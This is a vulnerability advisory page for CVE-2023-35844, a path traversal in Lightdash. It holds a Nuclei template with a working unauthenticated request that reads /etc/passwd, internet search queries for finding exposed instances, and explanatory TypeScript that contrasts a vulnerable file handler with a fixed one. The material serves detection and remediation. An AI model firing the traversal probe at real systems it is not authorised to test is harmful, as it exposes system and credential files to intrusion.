Lightdash version <= 0.510.3 Arbitrary File Read
ID: CVE-2023-35844
Severity: high
Author: dwisiswant0
Tags: cve,cve2023,lightdash,lfi
Description
packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow .. directory traversal and do not ensure that an intended file extension (.csv or .png) is used. The template below exercises one of these endpoints, /api/v1/slack/image/, with three URL-encoded ../ segments followed by /etc/passwd, and treats a 200 response containing the root entry as confirmation of the read. The request needs no credentials (CVSS PR:N).
YAML Source
id: CVE-2023-35844

info:
  name: Lightdash version <= 0.510.3 Arbitrary File Read
  author: dwisiswant0
  severity: high
  description: |
    packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow .. directory traversal and do not ensure that an intended file extension (.csv or .png) is used.
  impact: |
    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database credentials, and other confidential data.
  remediation: |
    Upgrade Lightdash to a version higher than 0.510.3 to mitigate the vulnerability.
  reference:
    - https://advisory.dw1.io/59
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35844
    - https://github.com/lightdash/lightdash/commit/fcc808c84c2cc3afb343063e32a49440d32a553c
    - https://github.com/lightdash/lightdash/compare/0.510.2...0.510.3
    - https://github.com/lightdash/lightdash/pull/5090
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-35844
    cwe-id: CWE-22
    epss-score: 0.04986
    epss-percentile: 0.92655
    cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lightdash
    product: lightdash
    shodan-query:
      - title:"Lightdash"
      - http.title:"lightdash"
    fofa-query: title="lightdash"
    google-query: intitle:"lightdash"
  tags: cve,cve2023,lightdash,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
      - type: status
        status:
          - 200
# digest: 4a0a00473045022012da6f99398ebc7af34bea9c90c8fa524415897bb2d909cc45276e17d4a25215022100f6de7c6fc2ed22612ad208af449fe9fef9c333512dd3ba30bf0c13e610a60868:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This Nuclei template detects the vulnerable endpoint with a single unauthenticated GET request (max-request: 1). It reports a finding only when both matchers hold (matchers-condition: and): the response status is 200 and the body contains a root entry in the form root:x:0:0 or root:*:0:0, which rules out error pages that merely echo the requested path. Run it against the base URL of the Lightdash instance with the Nuclei tool:
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-35844.yaml"
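To make the two halves of the page concrete, the following TypeScript is an added example, not code from the Nuclei template or from the Lightdash project. It builds the probe path exactly as the template's {{repeat('%2F..', 3)}} expands it, shows how an Express-style route hands that tail to a handler as one percent-decoded parameter, contrasts the vulnerable join-and-serve pattern with a hardened resolver that enforces both directory containment and the .csv/.png extension allowlist the description mentions, and reimplements the template's matcher logic. The route prefix, the storage directory /app/tmp and the handler shapes are assumptions chosen to illustrate CWE-22; they are not Lightdash's actual code. The /etc/passwd line in the test is constructed.

```typescript
import * as path from "path";

// Probe path as the template emits it: "slack-image" followed by `depth`
// URL-encoded "/.." segments and the encoded target file.
function buildProbePath(depth = 3, target = "%2Fetc%2Fpasswd"): string {
  return "/api/v1/slack/image/slack-image" + "%2F..".repeat(depth) + target;
}

// Assumed Express-style behaviour: %2F is not a route separator, so the whole
// tail after the prefix reaches the handler as a single, percent-decoded param.
function routeParam(probePath: string, prefix = "/api/v1/slack/image/"): string {
  return decodeURIComponent(probePath.slice(prefix.length));
}

// Vulnerable pattern (illustrative): join the caller-controlled name onto the
// storage directory and serve whatever it normalises to. "../" walks out.
function resolveUnsafe(baseDir: string, name: string): string {
  return path.join(baseDir, name);
}

// Hardened pattern: resolve first, then require the result to stay inside
// baseDir (trailing separator prevents "/app/tmp2" passing as "/app/tmp")
// and to carry one of the extensions this endpoint is meant to serve.
function resolveSafe(
  baseDir: string,
  name: string,
  allowedExts: string[] = [".csv", ".png"],
): string | null {
  const root = path.resolve(baseDir) + path.sep;
  const full = path.resolve(baseDir, name);
  if (!full.startsWith(root)) return null; // escaped the storage directory
  if (!allowedExts.includes(path.extname(full).toLowerCase())) return null; // wrong file type
  return full;
}

// The template's matcher set: status 200 AND a root passwd entry in the body.
// [x*] accepts both "root:x:0:0" (shadowed Linux) and "root:*:0:0" (BSD-style).
function templateMatches(status: number, body: string): boolean {
  return status === 200 && /root:[x*]:0:0/.test(body);
}

// Walk the probe through both handlers; returns what each would serve.
function demo(baseDir = "/app/tmp"): { param: string; unsafe: string; safe: string | null } {
  const param = routeParam(buildProbePath());
  return { param, unsafe: resolveUnsafe(baseDir, param), safe: resolveSafe(baseDir, param) };
}
```

The containment check alone would already stop the /etc/passwd read; the extension check is the second half of the fix the description calls out, and it also blocks an in-directory file of the wrong type (a .txt next to the generated .csv exports).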